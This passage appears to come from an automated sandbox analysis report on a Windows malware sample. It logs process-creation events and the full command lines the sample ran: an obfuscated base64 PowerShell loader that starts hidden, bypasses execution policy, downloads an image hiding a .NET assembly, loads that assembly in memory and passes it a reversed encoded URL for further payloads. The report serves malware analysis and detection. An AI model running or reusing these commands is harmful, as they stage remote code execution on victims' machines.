AuOvhPbYLDMAuOvhPbYLWgBXAuOvhPbYLDQAuOvhPbYLdgBOAuOvhPbYLGoAuOvhPbYLTQB5AuOvhPbYLEwAuOvhPbYLagBNAuOvhPbYLDEAuOvhPbYLTQBpAuOvhPbYLDQAuOvhPbYLMgBOAuOvhPbYLFQAuOvhPbYLRQB1AuOvhPbYLE4AuOvhPbYLRAuOvhPbYLBrAuOvhPbYLHYAuOvhPbYLTAuOvhPbYLB6AuOvhPbYLHAuOvhPbYLAuOvhPbYLdwBkAuOvhPbYLEgAuOvhPbYLUgBvAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBkAuOvhPbYLGYAuOvhPbYLZAuOvhPbYLBmAuOvhPbYLGQAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLYQBkAuOvhPbYLHMAuOvhPbYLYQAuOvhPbYLnAuOvhPbYLCAuOvhPbYLAuOvhPbYLLAuOvhPbYLAuOvhPbYLgAuOvhPbYLCcAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBjAuOvhPbYLHUAuOvhPbYLJwAuOvhPbYLpAuOvhPbYLCkAuOvhPbYL';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 19, 2023, 6:25 p.m.	thread_identifier: 1784 thread_handle: 0x00000330 process_identifier: 2184 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
ShellExecuteExW Oct. 19, 2023, 6:25 p.m.	show_type: 0 filepath_r: powershell parameters: -command "$Codigo = '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